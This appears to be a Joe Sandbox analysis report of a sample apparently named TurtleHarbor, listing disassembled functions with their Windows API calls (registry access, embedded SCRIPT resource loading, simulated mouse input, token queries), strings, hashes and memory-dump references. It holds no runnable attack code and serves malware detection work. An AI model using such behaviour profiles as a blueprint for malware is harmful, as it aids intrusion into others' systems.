Opcode ID: 02b08c7a163ecc43c52af2890e14b0fa40e0a0db66e87b9ff5a9c4803b95a46f
Instruction ID: b6100b97d72130d890bf8a523cbe12351284c07313f3d02579e877bcdc8f4a4f
Opcode Fuzzy Hash: 02b08c7a163ecc43c52af2890e14b0fa40e0a0db66e87b9ff5a9c4803b95a46f
Instruction Fuzzy Hash: 4A210732104521AED333AA24BC42FAB779CDF51700F51C436F4468B5ABEBA69E828295

Function 00397BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00312111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
Part of subcall function 00312111: GetStockObject.GDI32(00000011), ref: 00312163
Part of subcall function 00312111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00397C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00397C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00397C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00397C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00397C8A

Strings

Msctls_Progress32, xrefs: 00397C28

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 687c6ac303c3f862a869dfe80e6638a9ee535fd8ca0deab02a372b8529c0a82c
Instruction ID: 493a3e3ed952b9294f774731246d392ccee08bdc1c99c81f792f67029a742e6e
Opcode Fuzzy Hash: 687c6ac303c3f862a869dfe80e6638a9ee535fd8ca0deab02a372b8529c0a82c
Instruction Fuzzy Hash: 311182B2150219BEEF169F60CC85EE77F5DEF08798F014115FA08A60A0C7729C21DBA4

Function 00379ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00360817,?,?,00000000,00000000), ref: 00379EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00360817,?,?,00000000,00000000), ref: 00379EFF
LoadResource.KERNEL32(?,00000000,?,?,00360817,?,?,00000000,00000000,?,?,?,?,?,?,00324A14), ref: 00379F0F
SizeofResource.KERNEL32(?,00000000,?,?,00360817,?,?,00000000,00000000,?,?,?,?,?,?,00324A14), ref: 00379F20
LockResource.KERNEL32(00360817,?,?,00360817,?,?,00000000,00000000,?,?,?,?,?,?,00324A14,00000000), ref: 00379F2F

Strings

SCRIPT, xrefs: 00379EF5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 25cdbc853467e8bcd678ee5d8e1bfbbb862cfb06eaa1b20984a623e6784ef0bb
Instruction ID: fcdfa33ecd41d7fa2402a0334d9c457050e3c34f4ea44e39a7fb595c14a7fbef
Opcode Fuzzy Hash: 25cdbc853467e8bcd678ee5d8e1bfbbb862cfb06eaa1b20984a623e6784ef0bb
Instruction Fuzzy Hash: 42115A70200700AFE7268B25DC48F277BBDEBC6B12F10866DF509D6260DB71EC04C661

Function 00339D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00339D16

Part of subcall function 003333B7: EncodePointer.KERNEL32(00000000), ref: 003333BA
Part of subcall function 003333B7: __initp_misc_winsig.LIBCMT ref: 003333D5
Part of subcall function 003333B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0033A0D0
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0033A0E4
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0033A0F7
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0033A10A
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0033A11D
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0033A130
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0033A143
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0033A156
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0033A169
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0033A17C
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0033A18F
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0033A1A2
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0033A1B5
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0033A1C8
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0033A1DB
Part of subcall function 003333B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0033A1EE

__mtinitlocks.LIBCMT ref: 00339D1B
__mtterm.LIBCMT ref: 00339D24

Part of subcall function 00339D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00339D29,00337EFD,003CCD38,00000014), ref: 00339E86
Part of subcall function 00339D8C: _free.LIBCMT ref: 00339E8D
Part of subcall function 00339D8C: DeleteCriticalSection.KERNEL32(0R=,?,?,00339D29,00337EFD,003CCD38,00000014), ref: 00339EAF

__calloc_crt.LIBCMT ref: 00339D49
__initptd.LIBCMT ref: 00339D6B
GetCurrentThreadId.KERNEL32 ref: 00339D72

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 7f933256ff0265b0099ebc8cee72d7a2b0f6622073c109b0a9756de6ee0caf38
Instruction ID: 200d2807ff2872a9733a2da881c87a3453113057f1ebfe853207efaedb34e490
Opcode Fuzzy Hash: 7f933256ff0265b0099ebc8cee72d7a2b0f6622073c109b0a9756de6ee0caf38
Instruction Fuzzy Hash: F6F06D3250A7119AE73B7B747C8378A26D8DB42731F21475BF494DD0E2EFA088014190

Function 003341B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00334282,?), ref: 003341D3
GetProcAddress.KERNEL32(00000000), ref: 003341DA
EncodePointer.KERNEL32(00000000), ref: 003341E6
DecodePointer.KERNEL32(00000001,00334282,?), ref: 00334203

Strings

combase.dll, xrefs: 003341CE
RoInitialize, xrefs: 003341C2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 4b064634ad33654e3fe6cf2c27135f0977c0bdd644ce00d919b186faad3abf74
Instruction ID: 677c170df38deb1f0a12bff1846c6022f6b25794f215dae5d9447bc2cedb5b9b
Opcode Fuzzy Hash: 4b064634ad33654e3fe6cf2c27135f0977c0bdd644ce00d919b186faad3abf74
Instruction Fuzzy Hash: B3E01A78A91701AFDF531F70EC4DB49366CA712B06F604526F401D50E0DBB550848F00

Function 0033428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003341A8), ref: 003342A8
GetProcAddress.KERNEL32(00000000), ref: 003342AF
EncodePointer.KERNEL32(00000000), ref: 003342BA
DecodePointer.KERNEL32(003341A8), ref: 003342D5

Strings

RoUninitialize, xrefs: 00334297
combase.dll, xrefs: 003342A3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 2c0836e59e9940e7b335de967a7cea1f0c87bec0555183b7ee3780bd888e3876
Instruction ID: 5d4cb57b0877cc4cd7b320ac1c197dd6e09d68807cadaa153583a98ec46d80fd
Opcode Fuzzy Hash: 2c0836e59e9940e7b335de967a7cea1f0c87bec0555183b7ee3780bd888e3876
Instruction Fuzzy Hash: BCE0BD74692B01EFEF579F60BD4DB863BACBB02B02F50491AF001E60E0CBB55604CB10

Function 0031218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 003121B8
GetWindowRect.USER32(?,?), ref: 003121F9
ScreenToClient.USER32(?,?), ref: 00312221
GetClientRect.USER32(?,?), ref: 00312350
GetWindowRect.USER32(?,?), ref: 00312369

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 6cb3fc38a99b685b76942b6c64814dba4a8c7f8c1ab768620dcea28e56c84cb8
Instruction ID: 2402014cb1d6fe7324cbdd6b2c0ffdd389d9392b6133ea3f8602a24d9e843e6a
Opcode Fuzzy Hash: 6cb3fc38a99b685b76942b6c64814dba4a8c7f8c1ab768620dcea28e56c84cb8
Instruction Fuzzy Hash: 83B1B039900249DBCF15CFA8C8807EEB7B5FF48310F159529ED99EB654DB30A9A0CB64

Function 00376A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00376BC6
_memmove.LIBCMT ref: 00376B01

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

_memmove.LIBCMT ref: 00376B74
_memmove.LIBCMT ref: 00376C5B
_memmove.LIBCMT ref: 00376C74
_memmove.LIBCMT ref: 00376C90

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
Instruction ID: 66225dbc6b0a23345aafff12ccd2b74d4f2475946140ce0b65e48808155c8865
Opcode Fuzzy Hash: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
Instruction Fuzzy Hash: 56619F7150069AABCF2BEF60CC92EFE37A8AF09304F058559F8595F292DB389D45CB50

Function 00390844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00390980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003909A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 003909EC
RegCloseKey.ADVAPI32(00000000), ref: 003909F9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: dfd9c76b4bb1ba6d7010003b198d83931b0db890a1718257086b408da0455d1a
Instruction ID: dfdb6a05fe28958f91239e48211d0dc230ab7d5a9a129aa59a3a8c8782779907
Opcode Fuzzy Hash: dfd9c76b4bb1ba6d7010003b198d83931b0db890a1718257086b408da0455d1a
Instruction Fuzzy Hash: EA516C311082009FDB1AEF64C985E6BBBE9FF89314F04491DF5858B2A2DB31E945CB92

Function 00395DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00395E38
GetMenuItemCount.USER32(00000000), ref: 00395E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00395E97
GetMenuItemID.USER32(?,?), ref: 00395F06
GetSubMenu.USER32(?,?), ref: 00395F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00395F65

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 7eb5df454abe8581fab0a6649e92af4320a850e11b61b8192b50dd06292d4ae0
Instruction ID: ed3b0b48f5161d952cb1bc845e138915aeda913e571fb750fb38856c078a2d8c
Opcode Fuzzy Hash: 7eb5df454abe8581fab0a6649e92af4320a850e11b61b8192b50dd06292d4ae0
Instruction Fuzzy Hash: A8519D75E01615EFCF17EF64C845AAEB7B5EF48320F114059E806BB351CB31AE818B90

Function 0036F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0036F6A2
VariantClear.OLEAUT32(00000013), ref: 0036F714
VariantClear.OLEAUT32(00000000), ref: 0036F76F
_memmove.LIBCMT ref: 0036F799
VariantClear.OLEAUT32(?), ref: 0036F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0036F814

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 975a2ec4084cfb05193c6733826c77a93b59bba0be0c6515996f45888fdc3c39
Instruction ID: 6c3cf396f422493fb08c99855cc1cd68cc8b552153849f87aa66af030c3ded81
Opcode Fuzzy Hash: 975a2ec4084cfb05193c6733826c77a93b59bba0be0c6515996f45888fdc3c39
Instruction Fuzzy Hash: 2F5158B5A00209EFCB15CF58D884AAAB7B8FF4D354F15856AE959DB304E730E911CFA0

Function 003729B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003729FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372A4A
IsMenu.USER32(00000000), ref: 00372A6A
CreatePopupMenu.USER32 ref: 00372A9E
GetMenuItemCount.USER32(000000FF), ref: 00372AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00372B2D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 553563966fe61cb425ff648d06cfd7c19adb9b499f86e5d69c53fe06abf34089
Instruction ID: 7ebb9cd14505852a670451773d120ac97218b513e02943c0c3916089a58feacf
Opcode Fuzzy Hash: 553563966fe61cb425ff648d06cfd7c19adb9b499f86e5d69c53fe06abf34089
Instruction Fuzzy Hash: 5B51C070A00309DFCF36CF68C888BAFBBF8AF45314F108159E8199B2A1D7789944CB51

Function 00311B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00311B76
GetWindowRect.USER32(?,?), ref: 00311BDA
ScreenToClient.USER32(?,?), ref: 00311BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00311C08
EndPaint.USER32(?,?), ref: 00311C52

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 20c3f7635aee399b3bef4380a26f37c6e71ecd3d0e6ce60e4915c79a4404a4e0
Instruction ID: d784deee777c2ea545d0503855742c42ac86d9019ebf43b5d1998de1f95e9acd
Opcode Fuzzy Hash: 20c3f7635aee399b3bef4380a26f37c6e71ecd3d0e6ce60e4915c79a4404a4e0
Instruction Fuzzy Hash: 15419231104300AFD716DF24DC89FEA7BECEB5A364F140669FA958B2A1D7309845DB61

Function 0039BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(003D77B0,00000000,01015580,?,?,003D77B0,?,0039BC1A,?,?), ref: 0039BD84
EnableWindow.USER32(?,00000000), ref: 0039BDA8
ShowWindow.USER32(003D77B0,00000000,01015580,?,?,003D77B0,?,0039BC1A,?,?), ref: 0039BE08
ShowWindow.USER32(?,00000004,?,0039BC1A,?,?), ref: 0039BE1A
EnableWindow.USER32(?,00000001), ref: 0039BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0039BE61

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 98b96e97ebc607069a71a00e93bdcccb6436a8bacb690e48bfd8e1c15fd120ba
Instruction ID: f944a3b6bc39df1f48d2a6503cc69bdedff41734c7e2856c84a89df1e3501402
Opcode Fuzzy Hash: 98b96e97ebc607069a71a00e93bdcccb6436a8bacb690e48bfd8e1c15fd120ba
Instruction Fuzzy Hash: D0416C34600144EFDF27CF68E689BD4BBE5FF06714F1941A9EA488F2A2C731A845CB91

Function 00387788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,0038550C,?,?,00000000,00000001), ref: 00387796

Part of subcall function 0038406C: GetWindowRect.USER32(?,?), ref: 0038407F

GetDesktopWindow.USER32 ref: 003877C0
GetWindowRect.USER32(00000000), ref: 003877C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003877F9

Part of subcall function 003757FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375877

GetCursorPos.USER32(?), ref: 00387825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00387883

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: cd9b8711fc8c4a29e6b0958c7d1580a80168d33365689abe643dfeaeb12015cc
Instruction ID: 0db1d9535a37baf01f5802e0171501f89d8ea6af228a462a94442fc198d8cd45
Opcode Fuzzy Hash: cd9b8711fc8c4a29e6b0958c7d1580a80168d33365689abe643dfeaeb12015cc
Instruction Fuzzy Hash: E931E172508305ABD726EF14C849F9BB7EEFF89314F100919F59997191CB70E909CBA2

Function 00369431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00368CDE
Part of subcall function 00368CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00368CE8
Part of subcall function 00368CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00368CF7
Part of subcall function 00368CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00368CFE
Part of subcall function 00368CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00368D14

GetLengthSid.ADVAPI32(?,00000000,0036904D), ref: 00369482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0036948E
HeapAlloc.KERNEL32(00000000), ref: 00369495
CopySid.ADVAPI32(00000000,00000000,?), ref: 003694AE
GetProcessHeap.KERNEL32(00000000,00000000,0036904D), ref: 003694C2
HeapFree.KERNEL32(00000000), ref: 003694C9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
